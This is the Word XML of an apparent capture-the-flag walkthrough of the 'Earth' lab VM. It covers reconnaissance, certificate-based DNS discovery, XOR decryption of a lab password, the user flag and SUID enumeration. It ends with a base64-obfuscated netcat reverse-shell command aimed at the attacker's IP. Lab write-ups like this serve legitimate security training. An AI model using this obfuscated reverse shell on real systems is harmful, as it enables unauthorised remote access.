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1354"/>
        <w:gridCol w:w="2878"/>
      </w:tblGrid>
      <w:tr w:rsidR="00666605" w:rsidRPr="00666605" w14:paraId="480D6692" w14:textId="77777777" w:rsidTr="00666605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61FFB2B7" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29781051" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>IP (example)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E16B43C" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00666605" w:rsidRPr="00666605" w14:paraId="2A02A235" w14:textId="77777777" w:rsidTr="00666605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4524C3C8" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Kali / Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E77BA35" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.0.2.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422F41F8" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>replace with yours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00666605" w:rsidRPr="00666605" w14:paraId="69482817" w14:textId="77777777" w:rsidTr="00666605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4215A04C" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Earth VM / Victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52B363AB" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.0.2.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47036BB7" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666605">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>from your DHCP / netdiscover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35549C39" w14:textId="77777777" w:rsidR="00666605" w:rsidRDefault="00666605">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5956BCA9" w14:textId="381A1582" w:rsidR="00666605" w:rsidRDefault="00666605">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F1C6AF" w14:textId="09FA107A" w:rsidR="0096279E" w:rsidRDefault="0095714C">
      <w:r w:rsidRPr="0095714C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24CDF84A" wp14:editId="3A92E15A">
            <wp:extent cx="5731510" cy="3623310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="730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5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04FB" w14:textId="657D88E0" w:rsidR="0095714C" w:rsidRDefault="0095714C">
      <w:r>
        <w:t>Ip address of Victim Machine: 10.0.2.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569A408" w14:textId="59FAE104" w:rsidR="0095714C" w:rsidRDefault="0095714C">
      <w:r w:rsidRPr="0095714C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="089742CE" wp14:editId="0451929D">
            <wp:extent cx="5731510" cy="1532255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15386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8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74A" w14:textId="77777777" w:rsidR="00666605" w:rsidRDefault="00666605">
      <w:r w:rsidRPr="00666605">
        <w:t>Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C08FFB" w14:textId="5498C956" w:rsidR="0095714C" w:rsidRDefault="0095714C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Since,the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port 80 was open so we will check http://10.0.2.11 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73904EA7" w14:textId="17E1ED8F" w:rsidR="0095714C" w:rsidRDefault="0095714C">
      <w:r w:rsidRPr="0095714C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51634C55" wp14:editId="0FAF8E8F">
            <wp:extent cx="5731510" cy="2517775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="123196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5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9B7D" w14:textId="77777777" w:rsidR="0095714C" w:rsidRDefault="0095714C"/>
    <w:p w14:paraId="7CE4C599" w14:textId="22BBB0B7" w:rsidR="0095714C" w:rsidRDefault="0095714C">
      <w:r w:rsidRPr="0095714C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15771F05" wp14:editId="121E2F05">
            <wp:extent cx="5731510" cy="1741170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="41596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5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EB0" w14:textId="73BDF346" w:rsidR="00941267" w:rsidRDefault="00941267">
      <w:r>
        <w:t>OKAY but we know 443 port is also open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFCD78" w14:textId="491A392B" w:rsidR="00941267" w:rsidRDefault="00941267">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="007947BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://10.0.2.11/</w:t>
        </w:r>
        <w:r w:rsidRPr="007947BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58ACEB96" wp14:editId="7CD6B533">
              <wp:extent cx="5731510" cy="2740025"/>
              <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
              <wp:docPr id="87617745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6177450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40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CB5BFF5" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:r w:rsidRPr="00666605">
        <w:t>https://10.0.2.11 shows Fedora test page but nothing helpful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391FF62" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tip:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> Always inspect the TLS certificate.</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:br/>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>FireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666605">
        <w:t xml:space="preserve"> / Chrome → </w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Padlock </w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>▸</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Certificate </w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>▸</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Subject Alternative Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00666605">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF2339" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Found DNS names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2759D8DE" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CE19391" w14:textId="77777777" w:rsidR="00666605" w:rsidRPr="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666605">
        <w:t>terratest.earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23A100AC" w14:textId="77777777" w:rsidR="00666605" w:rsidRDefault="00666605"/>
    <w:p w14:paraId="2D428DB2" w14:textId="60346A3E" w:rsidR="00941267" w:rsidRDefault="00941267">
      <w:r w:rsidRPr="00941267">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55DCB400" wp14:editId="0DBD95D2">
            <wp:extent cx="5731510" cy="2017395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="3681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6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AD91" w14:textId="4F556EAF" w:rsidR="00941267" w:rsidRDefault="00941267">
      <w:r w:rsidRPr="00941267">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B8419AD" wp14:editId="7C401AB4">
            <wp:extent cx="5731510" cy="2598420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13659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6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671" w14:textId="77777777" w:rsidR="00941267" w:rsidRDefault="00941267"/>
    <w:p w14:paraId="4D71AC7F" w14:textId="0528F9C8" w:rsidR="00941267" w:rsidRDefault="00941267">
      <w:r w:rsidRPr="00941267">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10030F9A" wp14:editId="0BC3D34F">
            <wp:extent cx="4308231" cy="3064352"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="152659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1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738" cy="306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51A3" w14:textId="28C2ABB5" w:rsidR="00FE540B" w:rsidRDefault="00FE540B">
      <w:r w:rsidRPr="00FE540B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F4205CA" wp14:editId="5A7A9F8B">
            <wp:extent cx="4373649" cy="3094892"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="2544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3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487" cy="30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44C" w14:textId="787CA32F" w:rsidR="00447EB9" w:rsidRDefault="00447EB9">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="007947BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://terratest.earth.local/robots.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72EA026A" w14:textId="77777777" w:rsidR="004305E7" w:rsidRDefault="004305E7"/>
    <w:p w14:paraId="1CDBC010" w14:textId="5B915EAD" w:rsidR="00447EB9" w:rsidRDefault="00447EB9">
      <w:r w:rsidRPr="00447EB9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="208CBB81" wp14:editId="02E4A0AD">
            <wp:extent cx="5731510" cy="5337175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="89230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1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57D0" w14:textId="42189657" w:rsidR="00447EB9" w:rsidRDefault="00447EB9">
      <w:r w:rsidRPr="00447EB9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444C68A3" wp14:editId="0376FA91">
            <wp:extent cx="5731510" cy="1754505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5317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4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2A21" w14:textId="1CBA6471" w:rsidR="004305E7" w:rsidRDefault="004305E7">
      <w:r w:rsidRPr="004305E7">
        <w:t>We know that XOR encryption was used to encrypt the messages we saw on the Earth main page! If you read carefully there is an entry saying : testdata.txt was used to test encryption, so let’s see if we can open testdata.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3651475B" w14:textId="4AEB42CE" w:rsidR="004305E7" w:rsidRDefault="004305E7">
      <w:r w:rsidRPr="004305E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E6EB6CC" wp14:editId="619FAAE3">
            <wp:extent cx="5731510" cy="664210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="90172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0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7B6" w14:textId="77777777" w:rsidR="004305E7" w:rsidRPr="004305E7" w:rsidRDefault="004305E7" w:rsidP="004305E7">
      <w:r w:rsidRPr="004305E7">
        <w:lastRenderedPageBreak/>
        <w:t>Okay — to sum up all we have up to this point:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BFA7D8" w14:textId="77777777" w:rsidR="004305E7" w:rsidRPr="004305E7" w:rsidRDefault="004305E7" w:rsidP="004305E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004305E7">
        <w:t>we have the username which is terra &lt;- from testingnotes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396E46F" w14:textId="77777777" w:rsidR="004305E7" w:rsidRPr="004305E7" w:rsidRDefault="004305E7" w:rsidP="004305E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004305E7">
        <w:t xml:space="preserve">we have the encrypted message from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004305E7">
        <w:t>earh.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004305E7">
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC63D6F" w14:textId="77777777" w:rsidR="004305E7" w:rsidRPr="004305E7" w:rsidRDefault="004305E7" w:rsidP="004305E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004305E7">
        <w:t xml:space="preserve">we have the encryption key which is testdata.txt and which can be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004305E7">
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004305E7">
        <w:t xml:space="preserve"> to decrypt the messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F8D43" w14:textId="77777777" w:rsidR="004305E7" w:rsidRPr="004305E7" w:rsidRDefault="004305E7" w:rsidP="004305E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004305E7">
        <w:t xml:space="preserve">we know that there is admin page in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004305E7">
        <w:t>earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004305E7">
        <w:t>/admin so maybe we can figure out a way to log into it when we decrypt the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51586F50" w14:textId="7455600F" w:rsidR="004305E7" w:rsidRDefault="00655FA8">
      <w:r w:rsidRPr="00655FA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A53146A" wp14:editId="7CC68A02">
            <wp:extent cx="5731510" cy="2941955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4473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4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BCCB" w14:textId="42488B73" w:rsidR="00655FA8" w:rsidRDefault="00655FA8">
      <w:r>
        <w:t xml:space="preserve">So here we get the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> name: terra and password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00655FA8">
        <w:t>earthclimatechangebad4humans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA38BA" w14:textId="4FF3FD7B" w:rsidR="00655FA8" w:rsidRDefault="00655FA8">
      <w:r>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> go to the login page </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464722C4" w14:textId="5EC542D0" w:rsidR="00655FA8" w:rsidRDefault="00655FA8">
      <w:r w:rsidRPr="00655FA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50A12158" wp14:editId="19EE6FFB">
            <wp:extent cx="5731510" cy="1361440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="124899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9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E534" w14:textId="156FEED7" w:rsidR="00655FA8" w:rsidRDefault="00655FA8">
      <w:r w:rsidRPr="00655FA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="022A5812" wp14:editId="7A3D8342">
            <wp:extent cx="5731510" cy="1034415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="167883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37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A6BF" w14:textId="1ABCDB3E" w:rsidR="00655FA8" w:rsidRDefault="00655FA8">
      <w:r w:rsidRPr="00655FA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A338701" wp14:editId="70AC957D">
            <wp:extent cx="5731510" cy="695960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="147944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49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B4A2" w14:textId="77777777" w:rsidR="00655FA8" w:rsidRDefault="00655FA8"/>
    <w:p w14:paraId="5D98B188" w14:textId="1256C72C" w:rsidR="00655FA8" w:rsidRDefault="00655FA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2623AB71" wp14:editId="32926B0E">
            <wp:extent cx="5731510" cy="1385570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="128749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90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98C1" w14:textId="0DE4A940" w:rsidR="00655FA8" w:rsidRDefault="00655FA8">
      <w:r>
        <w:t>Okay we</w:t>
      </w:r>
      <w:r w:rsidR="00286CF9">
        <w:t xml:space="preserve"> got the flag file</w:t>
      </w:r>
      <w:r w:rsidR="00286CF9">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00286CF9" w:rsidRPr="00286CF9">
        <w:t>cat /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00286CF9" w:rsidRPr="00286CF9">
        <w:t>earth_web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00286CF9" w:rsidRPr="00286CF9">
        <w:t>/user</w:t>
      </w:r>
      <w:r w:rsidR="00286CF9">
        <w:t>_flag</w:t>
      </w:r>
      <w:r w:rsidR="00286CF9" w:rsidRPr="00286CF9">
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D658A48" w14:textId="2AED923B" w:rsidR="00286CF9" w:rsidRDefault="00286CF9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770F99DA" wp14:editId="349B8AF8">
            <wp:extent cx="5731510" cy="1542415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="51799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98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7F34" w14:textId="7E7C4403" w:rsidR="00286CF9" w:rsidRDefault="00286CF9">
      <w:r w:rsidRPr="00286CF9">
        <w:t>[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44775515" w14:textId="306DE291" w:rsidR="00286CF9" w:rsidRDefault="00286CF9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connecting to the target system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for getting the root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093B061" w14:textId="56974943" w:rsidR="00666605" w:rsidRDefault="00666605">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Find SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EBA5DB" w14:textId="7637BDB5" w:rsidR="0026008E" w:rsidRDefault="0026008E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026008E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5375B0D4" wp14:editId="5553A663">
            <wp:extent cx="3919189" cy="4085492"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="28357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74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057" cy="40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481" w14:textId="43B68151" w:rsidR="0026008E" w:rsidRDefault="0026008E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reset_root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> will help to set the root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7294B5" w14:textId="4DCFB419" w:rsidR="0026008E" w:rsidRDefault="0026008E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026008E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="343D0204" wp14:editId="13213121">
            <wp:extent cx="5731510" cy="300990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="71837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05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BBF" w14:textId="77777777" w:rsidR="00666605" w:rsidRDefault="00666605" w:rsidP="00666605">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026008E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo 'bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMi40IDQ0NDQK' |base64 -d | bash</w:t>
      </w:r>
    </w:p>
